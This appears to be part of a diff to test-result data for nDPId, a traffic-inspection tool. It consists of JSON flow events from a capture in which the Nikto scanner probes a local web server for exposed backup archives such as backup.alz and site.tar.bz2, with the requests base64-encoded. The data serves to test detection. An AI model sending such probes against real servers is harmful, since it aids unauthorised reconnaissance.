{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
